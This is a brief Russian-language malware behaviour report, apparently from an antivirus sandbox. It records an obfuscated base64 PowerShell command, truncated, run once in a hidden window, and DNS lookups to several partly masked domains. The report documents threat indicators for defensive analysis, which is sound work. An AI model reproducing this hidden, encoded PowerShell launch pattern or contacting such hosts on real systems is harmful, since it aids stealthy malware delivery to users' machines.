Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHQAbABiAG0AaQBwAHIAPQAnAEUAbQBrAHAAbQB0AG0AdAByAGsAZABzACcAOwAkAE8AZQB4AHoAaQBiAHkAbwBiAGwAagB4AC...
- DNS ASK ch####antown.com
- DNS ASK rn###nsion.com
- DNS ASK li#######servicestoronto.com
- DNS ASK sv###josip.eu
- DNS ASK uo###gados.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABXAHQAbABiAG0AaQBwAHIAPQAnAEUAbQBrAHAAbQB0AG0AdAByAGsAZABzACcAOwAkAE8AZQB4AHoAaQBiAHkAbwBiAGwAagB4AC...' (со скрытым окном)